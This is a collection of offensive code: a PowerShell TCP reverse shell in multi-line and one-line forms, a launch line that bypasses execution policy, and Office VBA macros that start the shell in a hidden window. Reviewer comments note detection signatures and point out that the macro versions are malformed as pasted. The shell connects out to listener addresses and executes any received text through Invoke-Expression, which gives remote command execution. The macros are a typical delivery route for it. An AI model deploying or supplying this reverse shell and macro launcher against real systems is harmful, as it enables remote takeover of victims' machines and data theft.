# Reverse shell, PowerShell TCP-client variant: connects OUT to a listener and
# executes whatever text it receives. Only run this against systems you are
# authorised to test. '172.16.95.X' is a placeholder octet; it must be replaced
# before the script can connect.
$client = New-Object System.Net.Sockets.TCPClient('172.16.95.X',4444);
$stream = $client.GetStream();
# 64 KiB zero-filled receive buffer (0..65535 is 65536 elements).
[byte[]]$bytes = 0..65535|%{0};
# Read blocks until data arrives; the loop ends when Read returns 0, i.e. the
# listener closed the connection.
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    # Decode only the $i bytes actually received, as ASCII (non-ASCII bytes are
    # not preserved by this encoding).
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    # The received text is interpolated into a double-quoted string and handed to
    # iex (Invoke-Expression): arbitrary remote command execution. The 2>&1 inside
    # the string merges the error stream into the captured output so failures are
    # echoed back to the operator as well.
    $sendback = (iex ". { $data } 2>&1" | Out-String );
    # Append a fake "PS <cwd>> " prompt so the operator's side reads like a shell.
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
# Reached only after the remote side closes the stream.
$client.Close()
# NOTE(review): there is no try/catch anywhere, so a failed connect or a
# terminating error escaping iex ends the script. From a detection standpoint,
# New-Object TCPClient + GetStream + iex in one script is a well-known
# script-block-logging / AMSI signature; presumably that is why this exists as a
# template rather than something expected to survive a monitored host.
# Launch wrapper for the saved script: -ExecutionPolicy Bypass overrides the
# policy for this process only (it is not a persistent setting), -File runs the
# script, and -NoExit keeps the console open afterwards.
# NOTE(review): "-ExecutionPolicy Bypass" on a command line is itself a common
# hunting artefact in process-creation logs.
powershell.exe -NoExit -ExecutionPolicy Bypass -File .\ton_script.ps1


# The same reverse shell collapsed onto one line, presumably for single-argument
# (-Command style) delivery. Target here is 10.10.10.10:80; the stray ';' right
# after the opening '{' is an empty statement and harmless. Behaviour is otherwise
# identical to the multi-line version: every chunk read from the socket is
# ASCII-decoded and executed through iex, output plus a fake prompt is sent back.
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Sub RunMultiLinePS_Inline()
    ' Demo: several PowerShell statements passed in a single -Command argument,
    ' separated by ';'. The process is started with WScript.Shell.Run's defaults
    ' (normal window, no wait), so the macro returns immediately.
    Dim wsh As Object
    Dim cmdLine As String

    cmdLine = "powershell.exe -Command ""$msg = 'Hello'; $date = Get-Date; Write-Output $msg; Write-Output $date"""

    Set wsh = CreateObject("WScript.Shell")
    wsh.Run cmdLine
    Set wsh = Nothing
End Sub
Sub ExecuterReverseShell()
    ' Launches the PowerShell reverse shell (same code as the .ps1 above) from a
    ' macro, with a hidden window, and BLOCKS the Office host until the shell
    ' session ends (third Run argument = True). Only for authorised testing.
    Dim psCommand As String
    Dim wsh As Object

    ' The PowerShell script to execute, assembled as one VBA string.
    ' NOTE(review): as pasted this does not look compilable: each continuation
    ' line ends in "&" without the trailing " _" VBA requires, and the doubled
    ' quotes on the iex line resolve to
    '     $sendback = (iex "." { $data } 2>&1" | Out-String );
    ' i.e. an unbalanced string. The Invoke-Expression $data variant at the
    ' bottom of the page avoids the nested quotes entirely.
    psCommand = "$client = New-Object System.Net.Sockets.TCPClient('172.16.95.129',4444);" & 
                "$stream = $client.GetStream();" & 
                "[byte[]]$bytes = 0..65535|%{0};" & 
                "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;" & 
                "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);" & 
                "$sendback = (iex ""."" { $data } 2>&1"" | Out-String );" & 
                "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';" & 
                "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);" & 
                "$stream.Write($sendbyte,0,$sendbyte.Length);" & 
                "$stream.Flush()};" & 
                "$client.Close()"

    ' Create the WScript.Shell object
    Set wsh = CreateObject("WScript.Shell")

    ' Run PowerShell with the command: window style 0 = hidden, True = wait for exit.
    ' NOTE(review): psCommand contains double quotes that are not escaped for the
    ' outer -Command "..." argument, so the resulting command line is malformed too.
    wsh.Run "powershell.exe -WindowStyle Hidden -Command ""& {" & psCommand & "}""", 0, True

    ' Release the object
    Set wsh = Nothing
End Sub
Sub ExecuterReverseShellAsync()
    ' Same reverse-shell launcher as ExecuterReverseShell, but Run is called with
    ' bWaitOnReturn = False so the macro returns at once and the Office host
    ' stays responsive while the hidden PowerShell process keeps running.
    ' Only for authorised testing.
    Dim psCommand As String
    Dim wsh As Object

    ' The PowerShell script to execute, assembled as one VBA string.
    ' NOTE(review): as pasted this does not look compilable: each continuation
    ' line ends in "&" without the trailing " _" VBA requires, and the doubled
    ' quotes on the iex line produce an unbalanced PowerShell string. The
    ' Invoke-Expression $data variant at the bottom of the page avoids the
    ' nested quotes entirely.
    psCommand = "$client = New-Object System.Net.Sockets.TCPClient('172.16.95.129',4444);" & 
                "$stream = $client.GetStream();" & 
                "[byte[]]$bytes = 0..65535|%{0};" & 
                "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;" & 
                "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);" & 
                "$sendback = (iex ""."" { $data } 2>&1"" | Out-String );" & 
                "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';" & 
                "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);" & 
                "$stream.Write($sendbyte,0,$sendbyte.Length);" & 
                "$stream.Flush()};" & 
                "$client.Close()"

    ' Create the WScript.Shell object
    Set wsh = CreateObject("WScript.Shell")

    ' Run PowerShell in the background (asynchronously): window style 0 = hidden,
    ' last argument False = do not wait for the process to finish.
    ' NOTE(review): psCommand contains double quotes that are not escaped for the
    ' outer -Command "..." argument, so the resulting command line is malformed too.
    wsh.Run "powershell.exe -WindowStyle Hidden -Command ""& {" & psCommand & "}""", 0, False

    ' Release the object
    Set wsh = Nothing
End Sub


# Apparently a replacement for the iex line of the reverse shell: the received
# text is passed straight to Invoke-Expression instead of being interpolated into
# a double-quoted string, so the line carries no embedded double quotes that
# would need escaping when the script is wrapped in a VBA string or a -Command
# argument. Security semantics are unchanged: whatever arrives on the socket is
# executed. Fragment only -- $data is defined by the read loop above.
$sendback = (Invoke-Expression $data 2>&1 | Out-String)